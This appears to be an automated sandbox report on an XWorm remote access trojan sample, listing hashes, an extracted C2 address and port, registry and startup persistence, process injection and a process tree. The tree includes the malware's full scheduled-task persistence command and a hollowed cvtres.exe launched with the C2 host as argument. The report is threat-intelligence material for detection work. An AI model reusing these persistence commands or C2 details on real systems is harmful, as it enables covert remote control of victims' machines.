xworm | 9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

General

Target

TGX.exe
Size

38KB
MD5

ee272fb8a6844eb8b30f35614f0baa1f
SHA1

48be70669ce639e648fca442892f458c8729aca0
SHA256

9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
SHA512

341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
SSDEEP

768:DzpMBIG6sJLIuv+044PF5Ph9tbkOwhnICFYCgc/:P6PDLfdFD9t4OwW8zJ

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

C2

browser-bangladesh.at.ply.gg:14018

Mutex

Dmpd64MhhEQE1POv

Attributes

install_file
USB.exe

aes.plain

Signatures

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

TGX.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation TGX.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	TGX.exe

Drops startup file 2 IoCs

Processes:

TGX.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk	TGX.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk	TGX.exe

Executes dropped EXE 3 IoCs

Processes:

TGX.exeTGX.exeTGX.exe

pid process

2816 TGX.exe
3652 TGX.exe
3936 TGX.exe

pid	process
2816	TGX.exe
3652	TGX.exe
3936	TGX.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

TGX.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGX = "C:\\Users\\Admin\\AppData\\Roaming\\TGX.exe"	TGX.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

TGX.exe

description pid process target process

PID 4640 set thread context of 4636 4640 TGX.exe cvtres.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1296 schtasks.exe

flow	ioc
18	ip-api.com

description	pid	process	target process
PID 4640 set thread context of 4636	4640	TGX.exe	cvtres.exe

pid	process
1296	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 20 IoCs

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

explorer.exe

pid process

4364 explorer.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

TGX.exepowershell.exe

pid process

4640 TGX.exe
3596 powershell.exe
3596 powershell.exe

pid	process
4364	explorer.exe

pid	process
4640	TGX.exe
3596	powershell.exe
3596	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

TGX.exeTGX.exepowershell.exeTGX.exeTGX.exe

description	pid	process
Token: SeDebugPrivilege	4640	TGX.exe
Token: SeDebugPrivilege	4640	TGX.exe
Token: SeDebugPrivilege	2816	TGX.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3652	TGX.exe
Token: SeDebugPrivilege	3936	TGX.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

TGX.exeexplorer.exe

pid process

4640 TGX.exe
4364 explorer.exe
4364 explorer.exe

pid	process
4640	TGX.exe
4364	explorer.exe
4364	explorer.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

TGX.execvtres.exepowershell.exe

description	pid	process	target process
PID 4640 wrote to memory of 1296	4640	TGX.exe	schtasks.exe
PID 4640 wrote to memory of 1296	4640	TGX.exe	schtasks.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4640 wrote to memory of 4636	4640	TGX.exe	cvtres.exe
PID 4636 wrote to memory of 3596	4636	cvtres.exe	powershell.exe
PID 4636 wrote to memory of 3596	4636	cvtres.exe	powershell.exe
PID 4636 wrote to memory of 3596	4636	cvtres.exe	powershell.exe
PID 3596 wrote to memory of 4384	3596	powershell.exe	explorer.exe
PID 3596 wrote to memory of 4384	3596	powershell.exe	explorer.exe
PID 3596 wrote to memory of 4384	3596	powershell.exe	explorer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TGX.exe
"C:\Users\Admin\AppData\Local\Temp\TGX.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TGX" /tr "C:\Users\Admin\AppData\Roaming\TGX.exe"
2⤵
- Creates scheduled task(s)
PID:1296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" browser-bangladesh.at.ply.gg 14018 <123456789> AA7744BB240B53EC55E3
2⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
4⤵
PID:4384

C:\Users\Admin\AppData\Roaming\TGX.exe
C:\Users\Admin\AppData\Roaming\TGX.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4364

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:4312

C:\Users\Admin\AppData\Roaming\TGX.exe
C:\Users\Admin\AppData\Roaming\TGX.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Users\Admin\AppData\Roaming\TGX.exe
C:\Users\Admin\AppData\Roaming\TGX.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3936

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TGX.exe.log
Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoitsbt4.kfj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\TGX.exe
Filesize
38KB

MD5
ee272fb8a6844eb8b30f35614f0baa1f

SHA1
48be70669ce639e648fca442892f458c8729aca0

SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

Download Submit
C:\Users\Admin\AppData\Roaming\TGX.exe
Filesize
38KB

MD5
ee272fb8a6844eb8b30f35614f0baa1f

SHA1
48be70669ce639e648fca442892f458c8729aca0

SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

Download Submit
C:\Users\Admin\AppData\Roaming\TGX.exe
Filesize
38KB

MD5
ee272fb8a6844eb8b30f35614f0baa1f

SHA1
48be70669ce639e648fca442892f458c8729aca0

SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

Download Submit
C:\Users\Admin\AppData\Roaming\TGX.exe
Filesize
38KB

MD5
ee272fb8a6844eb8b30f35614f0baa1f

SHA1
48be70669ce639e648fca442892f458c8729aca0

SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

Download Submit
C:\Users\Admin\AppData\Roaming\TGX.exe
Filesize
38KB

MD5
ee272fb8a6844eb8b30f35614f0baa1f

SHA1
48be70669ce639e648fca442892f458c8729aca0

SHA256
9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

SHA512
341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

Download Submit
memory/3596-153-0x0000000003130000-0x0000000003166000-memory.dmp

Filesize
216KB

Download
memory/3596-155-0x0000000005360000-0x0000000005370000-memory.dmp

Filesize
64KB

Download
memory/3596-168-0x00000000067B0000-0x00000000067CE000-memory.dmp

Filesize
120KB

Download
memory/3596-158-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/3596-157-0x0000000005970000-0x0000000005992000-memory.dmp

Filesize
136KB

Download
memory/3596-156-0x00000000059A0000-0x0000000005FC8000-memory.dmp

Filesize
6.2MB

Download
memory/3596-154-0x0000000005360000-0x0000000005370000-memory.dmp

Filesize
64KB

Download
memory/4636-173-0x0000000005800000-0x0000000005810000-memory.dmp

Filesize
64KB

Download
memory/4636-152-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/4636-151-0x0000000005800000-0x0000000005810000-memory.dmp

Filesize
64KB

Download
memory/4636-148-0x00000000059B0000-0x0000000005A42000-memory.dmp

Filesize
584KB

Download
memory/4636-150-0x00000000060A0000-0x0000000006644000-memory.dmp

Filesize
5.6MB

Download
memory/4636-149-0x0000000005A50000-0x0000000005AEC000-memory.dmp

Filesize
624KB

Download
memory/4636-147-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/4640-133-0x0000000000410000-0x0000000000420000-memory.dmp

Filesize
64KB

Download
memory/4640-143-0x000000001B960000-0x000000001B970000-memory.dmp

Filesize
64KB

Download
memory/4640-134-0x000000001B960000-0x000000001B970000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads